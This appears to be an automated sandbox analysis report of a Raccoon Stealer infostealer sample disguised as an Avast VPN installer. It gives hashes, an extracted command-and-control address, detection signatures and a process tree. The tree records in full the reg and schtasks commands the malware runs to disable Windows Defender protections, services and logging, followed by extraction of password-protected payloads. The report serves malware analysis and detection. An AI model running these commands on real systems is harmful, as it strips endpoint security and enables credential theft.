Analysis

  • max time kernel
    147s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    19-04-2022 02:29

General

  • Target

    812ea89ccfa0ed7c19abdac4729adbb60745451bd92cb2d71f478bf9b0be944e.exe

  • Size

    12.8MB

  • MD5

    6bd3725af2856133e2809e21747cabe6

  • SHA1

    348224efe0b0d577e07a8a7e485dd24478d9bc7a

  • SHA256

    812ea89ccfa0ed7c19abdac4729adbb60745451bd92cb2d71f478bf9b0be944e

  • SHA512

    bebef876018daebda078925def106668d7943aeab32dca866cae9358e80b204ae031c85fc87a5a653bd389d298c7334c9d841491498b4e65e15c828c64f34536

Malware Config

Extracted

Family

raccoon

Version

1.7.1-hotfix

Botnet

0422feff6c251ddfdca83125d9b8ae570db3b316

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 2 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 8 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 27 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 21 IoCs
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\812ea89ccfa0ed7c19abdac4729adbb60745451bd92cb2d71f478bf9b0be944e.exe
    "C:\Users\Admin\AppData\Local\Temp\812ea89ccfa0ed7c19abdac4729adbb60745451bd92cb2d71f478bf9b0be944e.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4820
    • C:\Users\Admin\AppData\Local\Temp\is-D68N5.tmp\812ea89ccfa0ed7c19abdac4729adbb60745451bd92cb2d71f478bf9b0be944e.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-D68N5.tmp\812ea89ccfa0ed7c19abdac4729adbb60745451bd92cb2d71f478bf9b0be944e.tmp" /SL5="$701CA,12689899,778240,C:\Users\Admin\AppData\Local\Temp\812ea89ccfa0ed7c19abdac4729adbb60745451bd92cb2d71f478bf9b0be944e.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4560
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\16TgUIYv\MMF.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\16TgUIYv\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3764
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:3888
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:232
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:1228
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:3748
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:2416
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:3828
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:4904
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:4700
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:3932
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1252
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:2548
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:4944
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:5052
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:4940
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:4452
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:2616
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:2244
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:2436
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:4136
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:4140
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:2940
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:4728
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:4568
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:4556
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:4272
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:232
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:4792
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:4168
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:2928
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:3932
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:4312
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:332
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\16TgUIYv\main.bat" "
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4256
                                                                        • C:\Windows\SysWOW64\mode.com
                                                                          mode 65,10
                                                                          5⤵
                                                                            PID:216
                                                                          • C:\ProgramData\16TgUIYv\7z.exe
                                                                            7z.exe e file.zip -p___________24167pwd79pwd22684___________ -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1440
                                                                          • C:\ProgramData\16TgUIYv\7z.exe
                                                                            7z.exe e extracted/file_3.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1572
                                                                          • C:\ProgramData\16TgUIYv\7z.exe
                                                                            7z.exe e extracted/file_2.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3808
                                                                          • C:\ProgramData\16TgUIYv\7z.exe
                                                                            7z.exe e extracted/file_1.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4188
                                                                          • C:\ProgramData\16TgUIYv\nmhost.exe
                                                                            "nmhost.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1412
                                                                            • C:\ProgramData\16TgUIYv\nmhost.exe
                                                                              "nmhost.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:3784
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\16TgUIYv\DiskRemoval.bat" "
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4172
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /T 60 /NOBREAK
                                                                            5⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:220
                                                                      • C:\Program Files (x86)\avastvpn.exe
                                                                        "C:\Program Files (x86)\avastvpn.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4248
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-I9TGP.tmp\avastvpn.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-I9TGP.tmp\avastvpn.tmp" /SL5="$10208,8012383,778240,C:\Program Files (x86)\avastvpn.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          • Loads dropped DLL
                                                                          • Drops file in Program Files directory
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2816
                                                                          • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                            "C:\Program Files (x86)\avast_secureline_setup.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Writes to the Master Boot Record (MBR)
                                                                            PID:4088
                                                                            • C:\Windows\Temp\asw-bb97bee1-2b57-4c06-9c5d-ee51d63a70ba\common\icarus.exe
                                                                              C:\Windows\Temp\asw-bb97bee1-2b57-4c06-9c5d-ee51d63a70ba\common\icarus.exe /icarus-info-path:C:\Windows\Temp\asw-bb97bee1-2b57-4c06-9c5d-ee51d63a70ba\icarus-info.xml /install
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Writes to the Master Boot Record (MBR)
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:708
                                                                              • C:\Windows\Temp\asw-bb97bee1-2b57-4c06-9c5d-ee51d63a70ba\common\icarus_ui.exe
                                                                                C:\Windows\Temp\asw-bb97bee1-2b57-4c06-9c5d-ee51d63a70ba\common\icarus_ui.exe /er_master:master_ep_7ea7753b-24eb-40cf-97b2-7d66905f125e /er_ui:ui_ep_d4cc2c91-f64d-45c3-aadc-9458295f5868
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Checks processor information in registry
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:4000
                                                                              • C:\Windows\Temp\asw-bb97bee1-2b57-4c06-9c5d-ee51d63a70ba\avast-vpn\icarus.exe
                                                                                C:\Windows\Temp\asw-bb97bee1-2b57-4c06-9c5d-ee51d63a70ba\avast-vpn\icarus.exe /er_master:master_ep_7ea7753b-24eb-40cf-97b2-7d66905f125e /er_ui:ui_ep_d4cc2c91-f64d-45c3-aadc-9458295f5868 /er_slave:avast-vpn_slave_ep_f59727d6-d6ee-41bd-9f9c-2102aa3147eb /slave:avast-vpn
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Checks computer location settings
                                                                                • Loads dropped DLL
                                                                                • Writes to the Master Boot Record (MBR)
                                                                                • Checks processor information in registry
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1820
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\ProgramData\xOUvu\MMF.vbs"
                                                                            5⤵
                                                                            • Checks computer location settings
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2284
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\xOUvu\DisableOAVProtection.bat" "
                                                                              6⤵
                                                                                PID:3376
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                  7⤵
                                                                                    PID:4688
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                    7⤵
                                                                                      PID:656
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                      7⤵
                                                                                        PID:3700
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                        7⤵
                                                                                          PID:1608
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                          7⤵
                                                                                            PID:4896
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                            7⤵
                                                                                              PID:3124
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                              7⤵
                                                                                                PID:3332
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                7⤵
                                                                                                  PID:4240
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                  7⤵
                                                                                                    PID:4124
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                    7⤵
                                                                                                      PID:4308
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                      7⤵
                                                                                                        PID:4960
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                        7⤵
                                                                                                          PID:4780
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                                                          7⤵
                                                                                                            PID:2336
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                            7⤵
                                                                                                              PID:4504
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                              7⤵
                                                                                                                PID:2828
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                7⤵
                                                                                                                  PID:2720
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                  7⤵
                                                                                                                    PID:2548
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                    7⤵
                                                                                                                      PID:1652
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                      7⤵
                                                                                                                        PID:1136
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                        7⤵
                                                                                                                          PID:1336
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                                                          7⤵
                                                                                                                            PID:3568
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                                                            7⤵
                                                                                                                              PID:2092
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                                                              7⤵
                                                                                                                                PID:3508
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                7⤵
                                                                                                                                  PID:4784
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                  7⤵
                                                                                                                                    PID:4800
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                    7⤵
                                                                                                                                      PID:4548
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      7⤵
                                                                                                                                        PID:4576
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        7⤵
                                                                                                                                          PID:2108
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                          7⤵
                                                                                                                                            PID:1204
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            7⤵
                                                                                                                                              PID:4940
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              7⤵
                                                                                                                                              • Modifies security service
                                                                                                                                              PID:4580
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              7⤵
                                                                                                                                                PID:1316
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\xOUvu\main.bat" "
                                                                                                                                              6⤵
                                                                                                                                                PID:4120
                                                                                                                                                • C:\Windows\SysWOW64\mode.com
                                                                                                                                                  mode 65,10
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5092
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e file.zip -p___________12659pwd5006pwd7116___________ -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4152
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_11.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:3460
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_10.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4344
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4380
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4004
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1044
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1708
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4652
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4428
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:360
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:3412
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:4596
                                                                                                                                                  • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                    "SgrmClientApi.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:3916
                                                                                                                                                    • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                      "SgrmClientApi.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5080
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\xOUvu\DiskRemoval.bat" "
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2392
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /T 60 /NOBREAK
                                                                                                                                                      7⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:4460

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                        Persistence

                                                                                                                                        Modify Existing Service

                                                                                                                                        2
                                                                                                                                        T1031

                                                                                                                                        Bootkit

                                                                                                                                        1
                                                                                                                                        T1067

                                                                                                                                        Defense Evasion

